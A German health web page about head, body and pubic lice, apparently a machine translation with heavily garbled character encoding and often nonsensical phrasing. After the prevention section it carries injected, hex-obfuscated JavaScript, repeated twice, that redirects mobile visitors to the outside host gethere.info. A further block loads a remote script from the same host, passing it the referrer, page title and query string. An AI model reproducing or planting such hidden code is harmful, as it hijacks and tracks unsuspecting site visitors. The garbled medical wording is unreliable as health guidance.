Krankheit

LAi??use

LAi??useLAi??use sind kleine, flA?gellose, parasitische Insekten, die auf Ihrem Blut zu ernAi??hren.Ai??LAi??use sind leicht verbreiten – vor allem von Schulkindern – durch engen persAi??nlichen Kontakt und durch den Austausch GegenstAi??nde.

Mehrere Arten von LAi??usen sind:

  • KopflAi??use.Ai??Ai??entwickeln Diese LAi??use auf der Kopfhaut.Ai??Sie sind am einfachsten, am Nacken und A?ber den Ohren zu sehen.
  • LAi??use.Ai??Ai??Diese LAi??use leben in Kleidung und BettwAi??sche auf und ziehen weiter, um Ihre Haut zu ernAi??hren.Ai??LAi??use meist auf Menschen – wie Obdachlose oder transiente Einzelpersonen -, die nicht in der Lage, regelmAi??AYig zu baden oder zu waschen Kleidung sind.
  • FilzlAi??use.Ai??Ai??Gemeinhin als Krabben, treten diese LAi??use auf der Haut und Haare der Schambereich und, weniger hAi??ufig, auf grobem KAi??rperbehaarung, wie Brusthaare, Augenbrauen oder Wimpern.

Sie oder Ihr Kind kann gute persAi??nliche Hygiene Gewohnheiten haben und immer noch LAi??use zu bekommen.Ai??Sofern nicht richtig behandelt, kann diese Bedingung ein wiederkehrendes Problem geworden.

Symptome

Anzeichen und Symptome von LAi??usen sind:

  • Intensiver Juckreiz.
  • Kitzeln GefA?hl von Bewegung der Haare.
  • LAi??use auf der Kopfhaut, KAi??rper, Kleidung oder Scham oder andere KAi??rperhaare.Erwachsene LAi??use kann etwa der GrAi??AYe eines Sesamsamen oder etwas grAi??AYer sein.
  • LAi??use-Eier (Nissen) auf Haarwellen.Ai??Nits wie kleine WeidenkAi??tzchen Knospen.Ai??Nits kAi??nnen verwechselt Schuppen sein, aber im Gegensatz zu Schuppen, kAi??nnen sie nicht einfach aus Haar gebA?rstet werden.
  • Kleine, rote Beulen auf der Kopfhaut, Nacken und Schultern.

Wenn zum Arzt
Normalerweise kann man von LAi??usen, indem sie Self-Care-MaAYnahmen, die mit rezeptfreien Shampoo, das speziell formuliert ist, um LAi??use zu tAi??ten sind loszuwerden.

Allerdings sehen Sie Ihren Arzt, wenn:

  • Nicht verschreibungspflichtige Shampoo nicht die LAi??use zu tAi??ten – Ihr Arzt kann eine stAi??rkere, verschreibungspflichtige Shampoo verschreiben
  • Du bist schwanger – verwenden Sie keine Anti-LAi??use-Shampoo, bis Sie mit Ihrem Arzt sprechen
  • Sie haben noch infiziert Nesselsucht oder Hautverletzungen durch Kratzen

Ursachen

Sie kAi??nnen LAi??use durch den Kontakt mit entweder LAi??use oder ihre Eier zu bekommen.Ai??Eier schlA?pfen in etwa eine Woche.Ai??LAi??use kAi??nnen nicht fliegen oder zu FuAY auf den Boden.Ai??Sie verbreiten sich durch:

  • Kopf-an-Kopf-oder KAi??rper-zu-KAi??rper-Kontakt.Ai??Ai??Dies kann auftreten, wenn Kinder oder Familienmitglieder zu spielen oder zu interagieren eng.
  • Die NAi??he der gespeicherten GegenstAi??nde.Ai??Ai??ablegen befallenen Kleidung in SchrAi??nken, in den SchlieAYfAi??chern oder Side-by-Side-Haken in der Schule oder Speicherung von persAi??nlichen GegenstAi??nden wie Kissen, Decken, KAi??mme und Stofftiere in der NAi??he zu Hause kann LAi??use erlauben, sich auszubreiten.
  • Artikel unter Freunden oder Familienmitgliedern geteilt.Ai??Ai??Diese kAi??nnen Kleidung, KopfhAi??rer, BA?rsten, KAi??mme, Haarschmuck, HandtA?cher, Decken, Kissen und Stofftiere gehAi??ren.
  • Kontakt mit kontaminierten MAi??bel.Ai??Ai??Liegen auf einem Bett oder sitzen in A?berfA?llten, mit Stoff bezogenen MAi??beln vor kurzem von jemand mit LAi??usen verwendet werden, kAi??nnen sie zu verbreiten.Ai??LAi??use kAi??nnen fA?r ein bis zwei Tagen aus dem KAi??rper zu leben.
  • Sexuelle Kontakte.Ai??Ai??FilzlAi??use in der Regel durch sexuellen Kontakt A?bertragen und am hAi??ufigsten betreffen Erwachsene.Ai??FilzlAi??use auf die Kinder gefunden kann ein Zeichen fA?r sexuellen Kontakt oder Missbrauch sein.

Vorbereitung fA?r den Termin

Oft kAi??nnen Sie mit over-the-counter-Behandlungen und richtig waschen kontaminierten HaushaltsgegenstAi??nde, wie BettwAi??sche, HandtA?cher und Kleidung loswerden LAi??use.Ai??Wenn diese MaAYnahmen nicht funktionieren, finden Sie in der medizinischen Grundversorgung Anbieter.

Weil Termine kAi??nnen kurz sein, und weil es oft eine Menge Boden zu decken, ist es eine gute Idee fA?r den Termin gut vorbereitet zu sein.Ai??Hier einige Informationen, die Ihnen helfen bereit fA?r den Termin, und wissen, was Sie von Ihrem Arzt erwarten.

Was Sie tun kAi??nnen

  • Schreiben Sie alle Symptome bei Ihnen auftreten,Ai??Ai??darunter alle, die auf den Grund, aus dem Sie den Termin geplant unabhAi??ngigen scheinen mag.
  • Notieren Sie wichtige persAi??nliche Informationen,Ai??Ai??einschlieAYlich, wenn Sie vielleicht LAi??use, denen Sie ausgesetzt haben kAi??nnte ausgesetzt worden sind, und welche HaushaltsgegenstAi??nde kAi??nnten verunreinigt sein.
  • Machen Sie eine Liste aller Medikamente,Ai??Ai??Vitamine oder NahrungsergAi??nzungsmittel, die Sie einnehmen.
  • Stellen Sie eine Familienmitglied oder Freund zusammen,Ai??Ai??wenn mAi??glich.Manchmal kann es schwierig sein, genieAYen Sie alle Informationen, die wAi??hrend eines Termins zur VerfA?gung gestellt.Ai??Jemand, der begleitet Sie kann etwas, was Sie verpasst oder vergessen zu erinnern.
  • Notieren Sie Fragen an Ihren Arzt fragen.Ai??Ai??Ihre Zeit mit Ihrem Arzt ist begrenzt, so bereitet eine Liste von Fragen vor der Zeit wird Ihnen helfen, das Beste aus Ihrer Zeit zusammen zu machen.Ai??Listen Sie Ihre Fragen von den meisten wichtig, weniger wichtig fA?r den Fall, die Zeit ablAi??uft.

Einige grundlegende Fragen an Ihren Arzt fragen, sind:

  • Wie behandle ich LAi??use?
  • Gibt es eine generische Alternative zu der Medizin verschreiben Sie haben?
  • Wie kann ich meinen Hausrat loswerden LAi??use?
  • Wer muss ich A?ber meinen Zustand zu informieren?
  • Welche anderen MaAYnahmen kann ich ergreifen mA?ssen, um nicht erneut befallen mich selbst oder andere?
  • Ist mein Zustand wahrscheinlich nur vorA?bergehend oder chronisch?
  • Gibt es irgendwelche BroschA?ren oder anderen gedruckten Unterlagen, die ich mit nach Hause nehmen?Ai??Welche Websites empfehlen Sie?
  • Sollte ich planen fA?r eine Follow-up-Besuch?

ZusAi??tzlich zu den Fragen, die Sie vorbereitet haben, Ihren Arzt fragen, zAi??gern Sie nicht, Fragen wAi??hrend Ihres Termins fragen, wenn Sie etwas nicht verstehen.

Was Sie von Ihrem Arzt erwarten, dass
Ihr Arzt Sie wahrscheinlich eine Reihe von Fragen, wie zum Beispiel fragen:

  • Wann haben Sie zum ersten Mal Symptome?
  • Wie wurden Sie ausgesetzt, um LAi??use?
  • Gibt es jemand, den Sie vielleicht ausgesetzt haben LAi??use?
  • Wie stark sind Ihre Symptome?

Was Sie in der Zwischenzeit tun kAi??nnen,
wenn Sie wissen oder wissen Sie, LAi??use zu haben, zu vermeiden, persAi??nliche GegenstAi??nde, BettwAi??sche, HandtA?cher oder Kleidung.Ai??Baden und folgen Self-Care-MaAYnahmen, einschlieAYlich Waschen kontaminierten GegenstAi??nden in heiAYem Wasser.

Wenn Sie denken, Sie wissen, oder eine SchamlAi??usebefall haben, auch vermeiden, sexuelle AktivitAi??t, bis Sie behandelt haben.

Untersuchungen und Diagnostik

WAi??hrend einer PrA?fung, kann Ihr Arzt Ihnen fA?r LAi??use mit einer Lupe untersuchen und prA?fen, ob Nissen mit einem speziellen Licht, die so genannte Wood-Licht, das macht die Nissen blass blau.

KopflAi??use
Eine Diagnose von KopflAi??usen kann nach einem Live-jungen oder erwachsenen Laus im Haar oder auf der Kopfhaut werden gefunden wird, oder nach einer oder mehreren Nissen wird auf Haarwellen innerhalb von 1/4 Zoll (6,4 Millimeter), der sich sehen Kopfhaut.

Wenn Sie nicht sehen, keine LAi??use oder Nissen, die Sie mehr als 1/4 Zoll weg von der Kopfhaut zu sehen, ist der Befall nicht mehr aktiv und Sie die Behandlung nicht brauchen.

LAi??use
Eine Diagnose der KAi??rperlAi??use kann gemacht werden, wenn Eier oder krabbeln LAi??use in den NAi??hten der Kleidung oder auf Betten gefunden werden.Ai??Es ist mAi??glich, einen KAi??rper Laus auf der Haut zu sehen, ob es dort kriecht zu fA?ttern.

FilzlAi??use
FilzlAi??use werden diagnostiziert, wenn bewegliche LAi??use oder Nissen auf Haare im Schambereich oder in anderen Bereichen des groben Haar, wie Brusthaare, Augenbrauen oder Wimpern gesehen.

Behandlungen und Medikamente

Verwenden Sie Medikamente, die LAi??use behandeln nur, wie verwiesen.Ai??Zu viel kAi??nnen rote, gereizte Haut.

KopflAi??use
Behandlung fA?r KopflAi??use kann bedeuten:

  • Over-the-counter-Produkte.Ai??Ai??Shampoos Pyrethrin (Rid, andere) oder Permethrin (Nix), das sind in der Regel die erste Option zur BekAi??mpfung von LAi??usen Befall.Ai??Diese funktionieren am besten, wenn Sie die Anweisungen sehr genau verfolgen.Ai??In einigen geografischen Standorten, haben LAi??use resistent gegen die Inhaltsstoffe in over-the-counter-Behandlungen LAi??use gewachsen.Ai??Wenn over-the-counter Zubereitungen nicht funktionieren, kann Ihr Arzt Shampoos oder Lotionen, die unterschiedliche Inhaltsstoffe enthalten verschreiben.
  • Verschreibungspflichtige Medikamente.Ai??Ai??Malathion (Ovide) ist ein verschreibungspflichtiges Medikament, dass Sie Ihre Haare gelten und dann reiben in die Haare und Kopfhaut.Ai??Malathion ist brennbar, so halten Sie es von WAi??rmequellen wie Haartrockner, elektrische Lockenwickler und Zigaretten.Ai??Wenn Sie schwanger sind oder stillen, mit Ihrem Arzt sprechen, bevor Sie dieses Produkt verwenden.Benzylalkohol-Lotion (Ulesfia) ist eine neuere verschreibungspflichtige Behandlung gegen KopflAi??use.Ai??Sie die Lotion auf die Kopfhaut und Haar fA?r 10 Minuten und spA?len Sie es mit Wasser, dann.Ai??Sieben Tage spAi??ter werden Sie die Behandlung zu wiederholen.Ai??MAi??gliche Nebenwirkungen sind Reizungen der Haut, der Kopfhaut und der Augen sowie TaubheitsgefA?hl an der Applikationsstelle.Ai??Dieses Medikament ist nicht fA?r Kinder unter 6 Monaten empfohlen.

    SchlieAYlich ist Lindan ein Rezept Shampoo, das manchmal vorgeschrieben ist, wenn andere MaAYnahmen versagen.Ai??Doch aufgrund der zunehmenden Resistenz der LAi??use gegen dieses Medikament und zu schweren neurologischen Nebenwirkungen, Lindan wird nicht mehr als First-Line Behandlung fA?r KopflAi??use empfohlen.


Wenn SieAi??LAi??useAi??LAi??use haben, mA?ssen Sie keine Behandlung.Ai??Sie mA?ssen jedoch die gleichen Selbst-Care-MaAYnahmen, wie z. B. die Behandlung von Kleidung und andere GegenstAi??nde, wie Sie es fA?r KopflAi??use zu nehmen.Ai??Wenn Self-Care-MaAYnahmen nicht zu der LAi??use loszuwerden, kann Ihr Arzt empfehlen, versucht einer der rezeptfreien oder verschreibungspflichtigen Behandlungen gegen KopflAi??use.

FilzlAi??use
FilzlAi??use kAi??nnen mit der gleichen verschreibungspflichtigen und nicht verschreibungspflichtigen Behandlungen gegen KopflAi??use eingesetzt behandelt werden.

Self-care wichtig,
ob Sie over-the-counter oder verschreibungspflichtige Shampoo verwenden, um LAi??use zu tAi??ten, viel von der Behandlung umfasst Self-Care-Schritte, die Sie zu Hause einnehmen kann.Dazu gehAi??ren dafA?r, dass alle Nissen entfernt werden, und dass alle Kleidung, BettwAi??sche, persAi??nliche GegenstAi??nde und MAi??bel dekontaminiert werden.Ai??In den meisten FAi??llen tAi??tet LAi??use auf den KAi??rper ist nicht schwer.Ai??Die Herausforderung ist, loszuwerden, alle Nissen und die Vermeidung von Kontakt mit anderen LAi??use zu Hause oder in der Schule.

Lifestyle und Hausmittel

Sie kAi??nnen mit einem Patienten, grA?ndliche Reinigung Ansatz, der sich selbst oder Ihr Kind und alle persAi??nlichen GegenstAi??nde, die kontaminiert sein kAi??nnen beinhaltet loswerden LAi??use.

Diese Schritte kAi??nnen helfen, LAi??use Befall zu beseitigen:

  • Verwenden Lotionen und Shampoos.Ai??Ai??WAi??hlen Sie zwischen mehreren over-the-counter Lotionen und Shampoos (Nix, Rid, andere) entwickelt, um LAi??use zu tAi??ten.Ai??Tragen Sie das Produkt nach Packungsanweisung.Ai??MAi??glicherweise mA?ssen Sie die Behandlung mit der Lotion oder Shampoo in sieben bis 10 Tage zu wiederholen.Ai??Diese Lotionen und Shampoos in der Regel sind nicht fA?r Kinder unter 2 Jahren empfohlen.
  • Nach Behandlung Shampoo, spA?len Sie Ihr Haar mit Essig.Ai??Ai??Fassen Sie eine HaarstrAi??hne mit einem Tuch mit Essig gesAi??ttigten und Streifen die Sperre nach unten, um Nissen zu entfernen.Ai??Wiederholen Sie, bis Sie alle Haare auf diese Weise behandelt habe.Ai??Oder genieAYen Haar mit Essig und lassen Sie ihn fA?r ein paar Minuten vor KAi??mmen.Dann Handtuch trocknen das Haar.Ai??Diese Methoden kAi??nnen helfen Nissen zu entfernen aus dem Haarschaft.Ai??Schneiden Haare sehr kurz auch helfen kAi??nnen.
  • KAi??mmen Sie das nasse Haar.Ai??Ai??Verwenden Sie ein Feinzahn oder Nissenkamm physisch entfernen Sie die LAi??use von nassem Haar.Ai??Wiederholen alle drei bis vier Tage, mindestens zwei Wochen.Ai??Dieses Verfahren kann in Kombination mit anderen Behandlungen eingesetzt werden und ist in der Regel als First-Line Behandlung fA?r Kinder unter 2 Jahren empfohlen.
  • Ai??VerschmutzteAi??GegenstAi??nde. Ai??BettwAi??sche waschen, Stofftiere, Kleidung und HA?te mit heiAYem Seifenwasser – mindestens 130 F (54 C) – und trocknen Sie sie bei hoher Hitze fA?r mindestens 20 Minuten.
  • Siegel unwashable GegenstAi??nde.Ai??Ai??Legen Sie sie in einem luftdichten Beutel fA?r zwei Wochen.
  • Vacuum.Ai??Ai??Geben Sie dem Boden und MAi??bel eine gute Staubsaugen.
  • Decken Sie MAi??bel.Ai??Ai??Mit einem Kunststoff Malers dropcloth, um MAi??bel fA?r zwei Wochen decken Erwerb einen weiteren Fall der LAi??use zu verhindern.Ai??Tun Sie das nicht, wenn Sie ein Kleinkind, und verwickelt sich in einer Kunststofffolie und erstickt zu haben.
  • KAi??mme und BA?rsten waschen.Ai??Ai??Verwenden sehr heiAYem Seifenwasser – mindestens 130 F (54 C) – oder genieAYen KAi??mme und BA?rsten in Alkohol fA?r eine Stunde.

Vorbeugung

Es ist schwierig, die Ausbreitung der KopflAi??use bei Kindern in der Kinderbetreuung und in der Schule zu verhindern.Ai??Es gibt so viel enger Kontakt zwischen Kindern und ihren Habseligkeiten, dass LAi??use leicht verbreiten.Ai??Es ist keine Reflexion auf Ihrem Hygienegewohnheiten oder die Ihrer Kinder, und es ist nicht ein Fehler auf Ihrem Teil als Eltern, wenn Ihr Kind KopflAi??use hat.

Einige over-the-counter-Produkte behaupten, LAi??use abstoAYen, aber mehr Forschung ist notwendig, um ihre Sicherheit und Wirksamkeit zu beweisen.

Eine Reihe von kleinen Studien haben gezeigt, dass die Zutaten in einige dieser Produkte – meist pflanzlichen Ai??len wie Rosmarin, Citronella, Eukalyptus, Teebaum und Zitronengras – kann funktionieren, um LAi??use zu vertreiben.Ai??Allerdings sind diese Produkte als “natA?rlich” eingestuft, so dass sie nicht von der Food and Drug Administration (FDA) reguliert, und ihre Sicherheit und Wirksamkeit wurden nicht FDA-Standards getestet.

Bis mehr Forschung beweist die Wirksamkeit der KopflAi??use PrAi??vention Produkte, ist der beste Ansatz, um eine grA?ndliche einfach Schritte, um die LAi??use loszuwerden – und deren Eier – so dass Sie nicht haben, mehr LAi??use zu behandeln.

  • Fragen Sie Ihr Kind, Kopf-an-Kopf-Kontakt zu vermeidenAi??Ai??mit Klassenkameraden wAi??hrend des Spiels und andere AktivitAi??ten.
  • Weisen Sie Ihr Kind nicht auf persAi??nliche GegenstAi??nde zu teilenAi??Ai??, wie HA?te, Schals, MAi??ntel, KAi??mme, BA?rsten, Haarschmuck und KopfhAi??rern.
  • Weisen Sie Ihr Kind auf gemeinsame RAi??ume zu vermeidenAi??Ai??, wo HA?te und Kleidung aus mehr als einen SchA?ler auf einer gemeinsamen Haken aufgehAi??ngt oder in einem SchlieAYfach aufbewahrt.

Allerdings ist es nicht realistisch zu erwarten, dass Sie und Ihr Kind kann alle Arten von Kontakt, die in der Verbreitung der LAi??use fA?hren kann, zu beseitigen.

Ihr Kind kann Nissen in seinem oder ihrem Haar haben, aber nicht unbedingt ein Fall von KopflAi??usen zu entwickeln.Ai??Einige Nissen sind leere Eier.Ai??Allerdings sollte Nissen, die in 1/4 Zoll (6,4 Millimeter) von der Kopfhaut behandelt werden – auch wenn Sie nur eine – die MAi??glichkeit der Brut zu verhindern.Ai??Nissen, die weiter von der Kopfhaut entfernt sind, sind wahrscheinlich aus einem alten Befall und mA?ssen nicht behandelt werden mA?ssen.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

Powered by: Wordpress